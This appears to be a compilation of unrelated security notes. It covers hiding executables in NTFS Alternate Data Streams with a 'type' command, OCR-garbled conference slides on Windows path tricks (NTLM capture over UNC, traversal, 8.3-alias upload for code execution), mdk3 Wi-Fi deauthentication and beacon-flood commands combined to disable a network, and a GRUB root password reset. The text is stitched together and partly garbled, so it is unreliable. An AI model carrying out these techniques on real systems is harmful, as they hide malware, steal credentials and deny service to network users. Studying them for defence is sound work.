Alternate Data Streams are extremely easy to make and require little or no skill on the part o the hacker. Common DOS commands like “type” are used to create an ADS. These commands are used in conjunction with a redirect [>] and colon [:] to fork one file into another.

For instance: the command

“type c:\anyfile.exe > c:\winnt\system32\calc.exe:anyfile.exe”

will fork the common windows calculator program with an ADS “anyfile.exe.”

Alarmingly files with an ADS are almost impossible to detect using native file browsing techniques like command line or windows explorer. In our example, the file size of calc.exe will show as the original size of 90k regardless of the size of the ADS anyfile.exe. The only indication that the file was changed is the modification time stamp, which can be relatively innocuous.

Once injected, the ADS can be executed by using traditional commands like type, or start or be scripted inside typical scripting languages like VB or Perl. When launched, the ADS executable will appear to run as the original file - looking undetectable to process viewers like Windows Task Manager. Using this method, it is not only possible to hide a file, but to also hide the execution of an illegitimate process.

Unfortunately, it is virtually impossible to natively protect your system against ADS hidden files if you use NTFS. The use of Alternate Data Streams is not a feature that can be disabled and currently there is no way to limit this capability against files that the user already has access to. Freeware programs like lads.exe by Frank Heyne (www.heysoft.de) and crucialADS by CrucialSecurity can be used to manually audit your files for the presence of Alternate Data Streams. Alternatively, the action of moving a file into another file system that doesn’t support ADS will automatically destroy any Alternate Data Streams.

Ultimately only a third party file checksum application can effectively maintain the integrity of an NTFS partition against unauthorized Alternate Data Streams. Recently dubbed as host based “Intrusion Prevention Systems” or “Intrusion Detection Systems”, third party security applications like eTrust Access Control from Computer Associates have been used for years in high-end government networks to verify the integrity of files used in the most secure environments. In addition to a heightened level of auditing and access control, these applications typically create an MD5 hashed database of file checksums that are used to validate a file’s trustworthiness. File injection techniques like Alternate Data Streams trigger an action by which the file is deemed untrusted and therefore prevented from executing or better yet, prevented from being changed in the first place.

In order to fully understand the implications of alternate data streams, the following walkthrough the creation and execution of an ADS using standard Windows 2000 programs on an NTFS 5.0 partition.

Figure 1 shows the executable file for the standard windows program calculator, calc.exe, with the original size of 90KB and a date modified time stamp of 7/26/2000.









We then append an alternate data stream to calc.exe with another standard windows program, notepad.exe as shown in









Figure 3 shows that while notepad.exe is 50KB, the file size of calc.exe has not changed from the original 90KB. We do see however that the date modified time stamp has changed.









we execute the new ADS notepad.exe using the standard command start.







On our desktop, the program notepad is executed however, an examination of the Windows Task Manager shows the original file name calc.exe. (Figure 5).
















Figure 5

Summary

Ultimately, the mere availability of Alternate Data Streams in NTFS is quite disconcerting and their usefulness suspect but in the end, the security features of NTFS far outweigh this potentially dangerous vulnerability. With knowledge and due diligence administrators can take actions to prevent and detect unauthorized use of ADS and in the end protect themselves adequately.

strange windows file stuff

link to original document

http://www.coresecurity.com/files/attachmentsWindows%20File%20Pseudonyms%20Dan%20Crowley%20Shmoocom%202010.pdf



DOS special device files
• Similar to device files on *nix nix
• Allows file operations to be performed on
devices
• Examples include:
– CON the console
CON,
– PRN, a parallel printer
– COM1, the first serial port
– NUL, a bit bucket (/dev/null equivalent)
• Pretty well known already, BUT…
When you speak to me ~ I redirect all of it ~ To slash-dev-slash-null.
DOS special files quirk #1
• They exist “everywhere”
• Can be accessed from any path, even:
– Directories which you are denied access to
– With an existing file as a “directory” which “contains”
directory contains
the file
• Examples of equivalent paths to CON:
– CON
– C:\CON
– C:\..\..\..\..\..\CON
C:\ \ \ \ \ \CON
– C:\restricted_dir\CON
– C:\existing_file.txt\CON
Like apparitions ~ They exist in every place ~ And yet in no place
DOS special files quirk #2
• They can have any file extension it’s ignored
extension, it s
• The following examples are equivalent:
– CON
– CON.bat
– CON.php
– CON.conf
– CON.thisisalongandarbitraryfileextension
– CON.<1000x”A”>
Mr. Shakespeare knows ~ A rose by another name ~ Still smells just as sweet
Buffer overflow
• A Windows app cat o ta es in a file name
do s application takes e a e
• The file is verified as existing
• If it exists, the program does something with the
file name
– And might trust that it doesn’t exceed NTFS
limitations
• What if the file name is “CON.<‘A’x1000>”?
– Technically, it exists…
h ll
– …but not in the filesystem, so it’s not bound to NTFS
limitations
Why one needs all this ~ DOS file extension stuff ~ Is just beyond me
Controlling file handling
• Don’t forget:
Don t
– You can use ANY extension!
– Files are often handled based on extension
• DOS special files, then, can often be handled
as ANYTHING YOU CHOOSE!
• http://www.example.com/com1.php
– What if COM1 was attached to a serial modem?
– …Or more likely, a Bluetooth dongle?
A riddle for you… ~ When is a CON not a CON? ~ When it’s a dot-jar!
What an awful mess!
I can t write haiku about
can’t
Namespace prefixes...
NAMESPACE PREFIXES
Namespace prefixes
• Used when files can’t be referred to with
can t
normal paths
– Because they’re really devices
they re
– Because they don’t exist on the local filesystem
– Because they have strange names
A distant echo ~ Of a victim, falling dead ~ The hunter shouts “PWNED!”
Minimal parsing prefix
• An invalid name or path can sometimes be
used anyway
– MAX_PATH can be exceeded
– Some restricted characters can be used
– Reserved basenames can be used
• Just precede it with \\?\
– Must be an absolute path p
• No current directory indicator ( ./ )
• No parent directory indicator ( ../ )
You don’t like the rules? ~ Double wack, question mark, wack. ~ You’re welcome, buddy.
UNC (Short and Long)
• Used to refer to files on SMB shares
– Can be used to refer to files across the Internet
• \\server name or ip\share\file
\\server_name_or_ip\share\file
– This is “Short UNC”
– Nothing terribly special
• \\?\UNC\server_name_or_ip\share\file
– This is “Long UNC”
Long UNC
– Allows for the use of the \\?\ prefix with UNC
paths
What’s the best thing ~ About SMB traffic? ~ Credential replay!
NT device namespace prefix
• Used to refer to device namespace
• These paths start with \\.\
• Examples include:
– \\ \airpcap00\
\\.\airpcap00\
• An AirPcap card
– \\.\GLOBALROOT\Device\HarddiskVolume1\
• The first hard disk volume on the machine
• Might be equivalent to, for instance, C:\
• Doesn’t need an assigned drive letter!
– \\.\CdRom0\
• The first disc drive on the computer
• WinObj from Sysinternals will allow you to browse the NT
device namespace
The device namespace ~ Allows access to devices ~ Using file paths
NTLM credential capture
• When accessing SMB shares, authentication
may be requested
– If an attacker runs the SMB server, you can bet it ,y
will
• The SMB client machine will often send stored
credentials automatically
– And as you may know these credentials can be
replayed or cracked
l d k d
– And we can trigger a machine to access an SMB
share with a UNC path!
A replay attack ~ With SMB credentials ~ Should not still succeed!
Directory traversal
• “C:\” doesn’t match:
C:\ doesn t
– \\?\C:\
– \\127 0 0 1\C$\
\\127.0.0.1\C$\
– \\127.3.13.37\C$\
– \\?\UNC\127 0 0 1\C$\
\\?\UNC\127.0.0.1\C$\
– \\.\GLOBALROOT\Device\HarddiskVolume1\
• …but they’re all equivalent!
b h ’ ll l
It is hard to stop ~ Directory traversal ~ Now more than ever
Buffer overflow
• Minimal parsing prefix allows for the use of
paths exceeding MAX_PATH
– Some developers don t know you can exceed
don’t
MAX_PATH
– …or assume that if the file exists that it can’t
or can t
exceed MAX_PATH
NOP NOP NOP NOP NOP ~ NOP NOP NOP NOP NOP Shellcode ~ Pointer to NOP sled
Making Windows rootkits deadlier
• Imagine that you’re a Windows sysadmin
ag e t at you e do s sysad
• Someone creates a file named “CON” with the
minimal parsing p
p g prefix
• You try “type CON” at the command line
– Your command prompt “hangs”
– None of your programs open it properly
– Windows Explorer can’t delete it
– You cry
– You pretend it doesn’t exist
• or convince yourself it really should be there
My reaction to ~ “Undocumented feature” ~ Is unbridled rage.
Now I understand,
But I still don’t believe you.
don t
SHOW ME THE MONEY!
DEMONSTRATION:
NGINX AND PHP ON WINDOWS
Thank you!
There’s no dumb question…
“Is the computer plugged in?”
Is pretty bad, though
bad though.
Do I have the time
To continue presenting?
That sure would be nice…
BONUS ROUND (DELETED SLIDES)
So?
• So “file phtml” is processed as PHP code
file.phtml
– A d “FILE~1.PHT” i served without processing
And “FILE 1 PHT” is d ith t i
• So “file.phPWNED” can be uploaded
– And “FILE~1.PHP” can be executed
Wait, what did you say? ~ Remote code execution? ~ NOW I’m listening!
How are 8.3 aliases generated?
• It’s somewhat complicated, but in short:
– Remove incompatible characters
– Convert spaces to underscores
– Take the first six characters of the basename
– Add “~”
• The digit is used to distinguish files with names starting with the
same six characters
• This convention isn’t used after the first 3 collisions
– Truncate the file extension to three characters
– Make all the characters uppercase
• This is simplified due to time constraints, read my
paper for more details!
Your name is too long ~ And uses weird characters. ~ Here’s another one!
Denial of Service
Denial-of-Service
• A theoretical application accepts file names and
t eo et ca app cat o e a es a d
reads the associated files
• This application blocks any file named “CON”,
pp y
“AUX”, “PRN” etc. to prevent DoS
– Applications will generally pause to read from a file
until EOF
til
– EOF may never arrive from devices like AUX
• It does NOT block files named for instance
named, instance,
“AUX.txt”
– Which we know is equivalent to AUX
…And while we’re at it, ~ Since we’re speaking of Shakespeare… ~ All’s well that ends well!

mdk3 killer mode

mdk3 eth0 d # deauthentication attack
mdk3 eth0 a -a # authentication flood
mdk3 eth0 b -n MyEssid -w -c 11 # beacon flood mode

The combination is:
- Running beacon flood mode to generate fake APs with the same name as your
victim
- Auth-DoS the original AP with intelligent mode
- Use the amok mode to kick the clients
And for the next version of mdk3
- Use the upcoming WIDS confusion mode to cross-connect kicked clients to
real and fake APs making all security systems go FUBAR.

In this 802.11-hell, there should be nobody able to access the network.
Because:
-> They get kicked when they connect (Amok mode)
-> They will see thousands of APs, unable to know which is the one to connect,
thus they are just trying around blindly (beacon flood)
-> The original AP may be too busy to handle the real clients because of the
Auth-DoS

lost root password change on linux

let's say you've lost your root password, or simply cannot log in as root after a hard drive install, and have no privileged users on your system. I'm about to show you how to get back in the game as root with a quick and dirty password-change hack.

For this tutorial, everything that is italicized is a user action. Anything in "angle brackets" is a keystroke. If it has a + beside it, it means press the keys at the same time.

// Changing the root password:

= - = - = - = - = - = - = - = - = - = - =

Reboot your computer. Wait for the grub screen... Press "ESC" when you're prompted.

Highlight the first option.

Press "e".

Highlight the kernel line.

Press "e".

Press "TAB". You'll get an error message.

Press "ESC".

Press "e" again.

Using your arrow keys, scroll back and change ro to rw

At the end of the line add: init=/bin/bash

Press "Enter"

Press "b"

Type at the prompt: passwd root

Enter the new password twice.

Press "CTRL"+"d" to cause a nice Kernel Panic. This will cause your system to hang.

Press and hold your power button till it shuts down. Power back up and let it boot into BackTrack normally.

Log in as root with your new password.